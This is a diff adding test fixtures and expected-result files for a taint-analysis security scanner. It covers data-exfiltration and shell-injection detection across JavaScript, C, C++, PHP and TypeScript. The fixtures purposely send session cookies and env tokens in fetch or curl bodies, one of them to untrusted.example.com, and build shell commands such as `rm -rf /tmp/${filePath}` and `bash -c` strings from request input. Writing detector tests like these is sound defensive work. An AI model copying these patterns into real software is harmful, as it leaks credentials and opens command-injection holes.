b/tests/fixtures/js/fetch_data_exfil_external_destination.js @@ -0,0 +1,15 @@ +// DATA_EXFIL allowlist-NEGATIVE fixture. +// +// The destination URL prefix (`https://untrusted.example.com/`) is NOT +// covered by the harness-installed +// [detectors.data_exfil.trusted_destinations] entries, so the cap MUST +// still fire on a Sensitive source flowing into the body. +// +// Driven by `fetch_data_exfil_suppression_tests.rs`. +function leakBodyExternal(req) { + var payload = req.cookies.session; + fetch('https://untrusted.example.com/intake', { + method: 'POST', + body: payload, + }); +} diff --git a/tests/fixtures/js/fetch_data_exfil_sanitizer_wrap.js b/tests/fixtures/js/fetch_data_exfil_sanitizer_wrap.js new file mode 100644 index 00000000..bb9c57ee --- /dev/null +++ b/tests/fixtures/js/fetch_data_exfil_sanitizer_wrap.js @@ -0,0 +1,13 @@ +// DATA_EXFIL sanitizer-convention fixture. +// +// `logEvent({user: req.cookies.session})` routes a Sensitive cookie source +// through a named telemetry boundary. The forwarding-wrapper convention +// (see docs/detectors/taint.md) treats `logEvent` as a default +// `Sanitizer(Cap::DATA_EXFIL)` so the cap does NOT fire on this call. +// +// Driven by `fetch_data_exfil_suppression_tests.rs`. +function track(req) { + logEvent({ + user: req.cookies.session, + }); +} diff --git a/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.c b/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.c new file mode 100644 index 00000000..c0f1b77b --- /dev/null +++ b/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.c @@ -0,0 +1,13 @@ +#include +#include + +void leak_env() { + char *token = getenv("AUTH_TOKEN"); + if (!token) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.expect.json b/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.expect.json new file mode 100644 index 00000000..da51bb01 --- /dev/null +++ b/tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call (not at the CURLOPT_URL setopt above it). getenv(\"AUTH_TOKEN\") is Sensitivity::Sensitive so DATA_EXFIL must fire.", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [4, 12], + "notes": "getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS." + } + ] +} diff --git a/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.c b/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.c new file mode 100644 index 00000000..33231900 --- /dev/null +++ b/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.c @@ -0,0 +1,13 @@ +#include +#include + +void forward_stdin() { + char input[256]; + if (!fgets(input, sizeof(input), stdin)) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.expect.json b/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.expect.json new file mode 100644 index 00000000..1788906f --- /dev/null +++ b/tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets/stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.c to assert per-tier routing for C.", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_not_match": true, + "line_range": [4, 12], + "notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration." + } + ] +} diff --git a/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp b/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp new file mode 100644 index 00000000..6cfed7a3 --- /dev/null +++ b/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp @@ -0,0 +1,13 @@ +#include +#include + +void leak_env() { + const char *token = std::getenv("AUTH_TOKEN"); + if (!token) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.expect.json b/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.expect.json new file mode 100644 index 00000000..5f5fb85f --- /dev/null +++ b/tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink in C++: same gating model as the C fixture. The activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call. std::getenv is Sensitivity::Sensitive so DATA_EXFIL must fire.", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [4, 12], + "notes": "std::getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS." + } + ] +} diff --git a/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.cpp b/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.cpp new file mode 100644 index 00000000..bd9c8213 --- /dev/null +++ b/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.cpp @@ -0,0 +1,13 @@ +#include +#include + +void forward_stdin() { + char input[256]; + if (!fgets(input, sizeof(input), stdin)) return; + + CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); + curl_easy_perform(curl); + curl_easy_cleanup(curl); +} diff --git a/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.expect.json b/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.expect.json new file mode 100644 index 00000000..511bc356 --- /dev/null +++ b/tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (std::getline from std::cin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.cpp to assert per-tier routing for C++.", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_not_match": true, + "line_range": [4, 12], + "notes": "Body source is plain user input (std::getline from std::cin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration." + } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.expect.json b/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.expect.json new file mode 100644 index 00000000..3a405271 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.expect.json @@ -0,0 +1,19 @@ +{ + "description": "Container-taint DATA_EXFIL: tokens array pushed with req.cookies.session is JSON-stringified into a fetch body. The SSA heap Elements slot carries the cap from `tokens.push(...)` to the sink-side `collect_tainted_sink_values` heap-load, so DATA_EXFIL must fire on the body field even though `payload` itself is not directly tainted by an Assign.", + "tags": ["taint", "data-exfil", "fetch", "container", "heap-elements", "cookie", "edge-case"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [12, 17], + "notes": "tokens.push(req.cookies.session) → JSON.stringify({batch: tokens}) → fetch body. Heap Elements taint must round-trip through the container." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [12, 17], + "notes": "fetch URL is a fixed literal — body taint must not surface as SSRF." + } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.js b/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.js new file mode 100644 index 00000000..8c2f4967 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/array_push_data_exfil.js @@ -0,0 +1,21 @@ +var express = require('express'); +var app = express(); + +// Container-taint DATA_EXFIL: push a Sensitive cookie source into an +// array, then send the joined batch as the outbound `fetch` body. The +// SSA heap model marks the array's `Elements` slot tainted at the +// `tokens.push(...)` write; the sink-side `collect_tainted_sink_values` +// loads the same slot and observes the cap, so DATA_EXFIL must fire on +// the body channel even though the body var (`payload`) is not directly +// tainted. Pairs with `array_push_taint.js` (same shape, different +// sink: XSS). +app.post('/batch', function(req, res) { + var tokens = []; + tokens.push(req.cookies.session); + var payload = JSON.stringify({ batch: tokens }); + fetch('https://analytics.internal/track', { + method: 'POST', + body: payload, + }); + res.status(204).end(); +}); diff --git a/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.expect.json b/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.expect.json new file mode 100644 index 00000000..4a232ce4 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.expect.json @@ -0,0 +1,19 @@ +{ + "description": "Async/await DATA_EXFIL parity: an `await fetch(URL, {body: ...})` call with a Sensitive cookie source must fire DATA_EXFIL on the body field (no SSRF — destination is a fixed literal). Awaits do not strip taint; the cap split is preserved across the await edge identically to the synchronous fetch path.", + "tags": ["taint", "data-exfil", "fetch", "async", "await", "cookie", "edge-case"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [13, 16], + "notes": "req.cookies.session → JSON.stringify into await fetch body. Await must not silence the cap." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [13, 16], + "notes": "fetch URL is a fixed literal — body taint must not fire as SSRF." + } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.js b/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.js new file mode 100644 index 00000000..affa7934 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.js @@ -0,0 +1,18 @@ +var express = require('express'); +var app = express(); + +// Async/await DATA_EXFIL: `await fetch(...)` must preserve the cap +// split. The destination URL is a fixed string literal (so SSRF must +// NOT fire) but a Sensitive cookie source threads through the body +// channel of the awaited call, so `Cap::DATA_EXFIL` MUST fire on the +// body field. Awaiting a Promise does not strip taint, the SSA lowering +// preserves chained await values across .then/.await edges identically +// to the synchronous fetch case. +app.post('/sync-async', async function (req, res) { + var sid = req.cookies.session; + await fetch('https://analytics.internal/track', { + method: 'POST', + body: JSON.stringify({ session: sid }), + }); + res.status(204).end(); +}); diff --git a/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.expect.json b/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.expect.json new file mode 100644 index 00000000..2f0d450f --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.expect.json @@ -0,0 +1,13 @@ +{ + "description": "Constructor cap narrowing: env secret flowing through `new Stripe(key)` must not propagate FILE_IO into the wrapper, so SDK-method-returned property values written to a file do not flag a phantom path-traversal flow.", + "tags": ["taint", "file_io", "constructor", "sdk", "negative", "regression-fp"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [9, 16], + "notes": "process.env.STRIPE_SECRET_KEY → new Stripe(key) → stripe.prices.create() → price.id → fs.writeFileSync — wrapper-object construction strips FILE_IO." + } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.js b/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.js new file mode 100644 index 00000000..bdd62479 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.js @@ -0,0 +1,17 @@ +// Constructor cap narrowing: a third-party SDK client constructed from an +// env-derived secret returns objects whose string properties are +// SDK-generated, not derived from the secret in any path-shaped sense. +// `Cap::all()` flowing through `new Stripe(key)` must drop FILE_IO so +// downstream `fs.writeFileSync` of an SDK property does not flag a phantom +// path-traversal flow. +var fs = require('fs'); + +var key = process.env.STRIPE_SECRET_KEY; +var stripe = new Stripe(key); + +async function setup() { + var price = await stripe.prices.create({ unit_amount: 9599 }); + var line = 'PRICE_ID="' + price.id + '"'; + fs.writeFileSync('./out.env', line); +} +setup(); diff --git a/tests/fixtures/real_world/javascript/taint/fetch_session_forward.expect.json b/tests/fixtures/real_world/javascript/taint/fetch_session_forward.expect.json new file mode 100644 index 00000000..14fb5250 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/fetch_session_forward.expect.json @@ -0,0 +1,19 @@ +{ + "description": "Session-id forwarder: req.cookies.session (Sensitive-tier source) flows into a fixed-URL fetch body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Pairs with fetch_tainted_body_safe.js (Plain source, silenced) to assert the source-sensitivity gate routes per-tier rather than globally.", + "tags": ["taint", "data-exfil", "fetch", "sensitivity-gate", "cookie", "cap-attribution"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [10, 17], + "notes": "fetch URL is a fixed literal — body taint must not fire as SSRF." + }, + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [10, 17], + "notes": "req.cookies.session → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body field." + } + ] +} diff --git a/tests/fixtures/real_world/javascript/taint/fetch_session_forward.js b/tests/fixtures/real_world/javascript/taint/fetch_session_forward.js new file mode 100644 index 00000000..d1480653 --- /dev/null +++ b/tests/fixtures/real_world/javascript/taint/fetch_session_forward.js @@ -0,0 +1,18 @@ +var express = require('express'); +var app = express(); + +// Session-id forwarder: an internal handler proxies the user's session +// cookie into the body of an outbound request to a fixed analytics URL. +// The destination is hardcoded so SSRF must NOT fire, but the source is +// Sensitive-tier (cookie carries auth material) so Cap::DATA_EXFIL MUST +// fire — operator-bound state is leaving the process via the request +// payload. +app.get('/sync', function(req, res) { + var sid = req.cookies.session; + fetch('https://analytics.internal/track', { + method: 'POST', + headers: { 'Content-Type': 'application/json' }, + body: JSON.stringify({ session: sid }), + }); + res.status(204).end(); +}); diff --git a/tests/fixtures/real_world/javascript/taint/fetch_tainted_body_safe.expect.json b/tests/fixtures/real_world/javascript/taint/fetch_tainted_body_safe.expect.json index 0c42f768..8b495210 100644 --- a/tests/fixtures/real_world/javascript/taint/fetch_tainted_body_safe.expect.json +++ b/tests/fixtures/real_world/javascript/taint/fetch_tainted_body_safe.expect.json @@ -1,6 +1,6 @@ { - "description": "fetch() with a fixed destination URL and an attacker-controlled body. SSRF must NOT fire (destination is not attacker-influenced) and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) MUST fire on the body field.", - "tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution"], + "description": "fetch() with a fixed destination URL and a plain user-input body (req.body.message). SSRF must NOT fire (destination is not attacker-influenced) and DATA_EXFIL must NOT fire either: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL).", + "tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution", "sensitivity-gate"], "modes": ["full"], "expected": [ { @@ -11,9 +11,9 @@ }, { "rule_id": "taint-data-exfiltration", - "must_match": true, + "must_not_match": true, "line_range": [7, 14], - "notes": "Body field carries req.body.message → must fire DATA_EXFIL (sensitive data leaving the process via outbound request payload)." + "notes": "Body source is plain user input (req.body.message → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, headers, env, db, file) — plain user input echoed into a request body is not data exfiltration. See fetch_body_user_input_silenced.js for the unit-level regression." } ] } diff --git a/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.expect.json b/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.expect.json new file mode 100644 index 00000000..2f323896 --- /dev/null +++ b/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.expect.json @@ -0,0 +1,13 @@ +{ + "description": "curl_setopt($ch, CURLOPT_POSTFIELDS, $payload) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a define-style identifier via the macro-arg fallback, narrowing the gate so DATA_EXFIL fires only at the body-binding setopt call. The cookie source is Sensitivity::Sensitive so DATA_EXFIL must fire. The CURLOPT_RETURNTRANSFER setopt on the next line must NOT trigger the gate (different option, not a body slot).", + "tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-data-exfiltration", + "must_match": true, + "line_range": [3, 10], + "notes": "$_COOKIE['auth_token'] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_setopt body-binding call gated by CURLOPT_POSTFIELDS." + } + ] +} diff --git a/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php b/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php new file mode 100644 index 00000000..701bcd50 --- /dev/null +++ b/tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php @@ -0,0 +1,10 @@ + { + const files = req.body.files; + for (const [filePath, content] of Object.entries(files)) { + // TP: filePath is destructured from Object.entries(files) where files + // carries taint. Without the for-of pattern handler the binding + // is never registered as a definition and taint stops at `files`. + exec(`rm -rf /tmp/${filePath}`); + } + res.send("ok"); +}); diff --git a/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.expect.json b/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.expect.json new file mode 100644 index 00000000..7c9e0d5a --- /dev/null +++ b/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.expect.json @@ -0,0 +1,38 @@ +{ + "description": "Regression guard: static shell payloads, non-shell arrays, canonical Dockerode argv, opaque array vars, and execSync(cmd, { env: process.env }) must not fire SHELL_ESCAPE.", + "tags": ["taint", "shell-injection", "shell-array", "regression-guard", "typescript"], + "modes": ["full"], + "strict_unexpected": ["taint-unsanitised-flow"], + "expected": [ + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [13, 18], + "notes": "Constant shell payload — no idents in element 2, detector emits no sink filter." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [20, 26], + "notes": "First element is not a known shell — detector ignores even though element 2 is tainted." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [28, 34], + "notes": "Canonical Dockerode argv form — constant array, locked in by EXCLUDES." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [37, 43], + "notes": "Opaque variable, not a literal — detector inspects only literal arrays." + }, + { + "rule_id": "taint-unsanitised-flow", + "must_not_match": true, + "line_range": [46, 49], + "notes": "execSync(cmd, { env: process.env }) — arg 1 is the options object, not the command. Locked in by =execSync gate's payload_args: &[0]." + } + ] +} diff --git a/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.ts b/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.ts new file mode 100644 index 00000000..6ef21bcf --- /dev/null +++ b/tests/fixtures/real_world/typescript/taint/shell_array_safe_const.ts @@ -0,0 +1,52 @@ +// Negative regression: shell-arrays whose payload is a static literal must +// not fire (no taint can reach a constant), and array literals whose first +// element is not a known shell must not fire even with taint in element 2. +// Also locks in the four FPs documented in the recent EXCLUDES carve-out: +// the canonical Dockerode `container.exec({ Cmd: argv })` form, an opaque +// untainted-array variable, and `execSync(cmd, { env: process.env })`. +import Docker from "dockerode"; + +const docker = new Docker({ socketPath: "/var/run/docker.sock" }); + +async function inert(_id: string, _cmd: string[]): Promise {} + +export async function staticShellPayload(req: any): Promise { + // Constant payload — the third element is a literal string. Even though + // the array shape matches [bash, -c, *], no identifiers exist in element + // 2 so the detector emits no sink filter. + await inert("c", ["bash", "-c", "ls -la /app"]); +} + +export async function nonShellArray(req: any): Promise { + const tainted = req.query.cmd; + // First element is not a known shell. Detector should not match even + // though element 2 carries taint. + await inert("c", ["ls", "-la", tainted]); +} + +export async function dockerodeCanonicalArgv( + containerId: string, + req: any +): Promise { + const container = docker.getContainer(containerId); + // Canonical Dockerode shape: argv is passed directly to execve, no shell + // parsing. Constant array — must not fire, locked in by EXCLUDES. + await container.exec({ Cmd: ["ls", "-la"], AttachStdout: true }); +} + +export async function dockerodeOpaqueArrayVar( + containerId: string, + argv: string[] +): Promise { + const container = docker.getContainer(containerId); + // Variable, not literal — detector inspects only literal arrays. + await container.exec({ Cmd: argv, AttachStdout: true }); +} + +export async function execSyncWithEnv(_req: any): Promise { + const { execSync } = require("child_process"); + // Existing carve-out: the env arg is never a shell-injection payload, the + // bare destructured-import `execSync` gate (=execSync) restricts + // payload_args to arg 0 (the command string). Locked in. + execSync("npx playwright test", { env: process.env }); +} diff --git a/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.expect.json b/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.expect.json new file mode 100644 index 00000000..acbe0b30 --- /dev/null +++ b/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.expect.json @@ -0,0 +1,14 @@ +{ + "description": "Shell-injection via [shell, '-c', tainted] array passed through a user-defined wrapper. Detection must fire at the array literal site without per-wrapper summary annotation.", + "tags": ["taint", "shell-injection", "shell-array", "typescript"], + "modes": ["full"], + "expected": [ + { + "rule_id": "taint-unsanitised-flow", + "must_match": true, + "line_range": [24, 29], + "evidence_contains": [], + "notes": "TP: req.query.name flows through the third array element of a [bash, -c, ...] shell-array passed to an opaque wrapper. The shell-array shape itself is the gate." + } + ] +} diff --git a/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.ts b/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.ts new file mode 100644 index 00000000..2f499edc --- /dev/null +++ b/tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.ts @@ -0,0 +1,31 @@ +// Reproduces the docker.ts pattern: a user-defined wrapper passes a shell-array +// literal to an opaque helper that ultimately invokes the shell. The taint +// vector is the third array element (the shell command string) — single-quote +// escaping in the interpolated `name` breaks out of the surrounding `'...'` +// and runs arbitrary commands. Detection must fire at the wrapper call site +// without needing any summary annotation on `runShellWrapper`. +import express from "express"; +const app = express(); + +async function runShellWrapper(_id: string, _cmd: string[]): Promise { + // Opaque wrapper. In real code this dispatches to Dockerode + // `container.exec({Cmd: cmd})` — the shell-array recognition runs at the + // *outer* call site below, not here, because `container.exec` is excluded + // from flat sink classification on purpose (it accepts non-shell argv + // arrays in the canonical form). + return ""; +} + +app.get("/run", async (req: any, res: any) => { + const name = req.query.name; + // TP: `name` is interpolated inside a single-quoted shell context. A + // quote in `name` escapes the quoting and runs arbitrary shell commands. + // Detection must fire here, at the call site of the user wrapper, even + // though the wrapper is opaque to summary inference. + await runShellWrapper("container-id", [ + "bash", + "-c", + `echo 'hello ${name}' > /tmp/out`, + ]); + res.send("ok"); +}); diff --git a/tests/ssa_equivalence_tests.rs b/tests/ssa_equivalence_tests.rs index b7888475..be234f06 100644 --- a/tests/ssa_equivalence_tests.rs +++ b/tests/ssa_equivalence_tests.rs @@ -769,6 +769,8 @@ fn orphan_catch_block_triggers_reachability_invariant() { exception_edges: vec![], // intentionally empty, the orphan condition, field_interner: nyx_scanner::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let err = check_catch_block_reachability(&body) @@ -830,6 +832,8 @@ fn normally_reachable_catch_block_passes_invariant() { exception_edges: vec![], field_interner: nyx_scanner::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; assert!(check_catch_block_reachability(&body).is_ok()); @@ -883,6 +887,8 @@ fn exception_edge_catch_block_passes_invariant() { exception_edges: vec![(BlockId(0), BlockId(1))], field_interner: nyx_scanner::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; assert!(check_catch_block_reachability(&body).is_ok());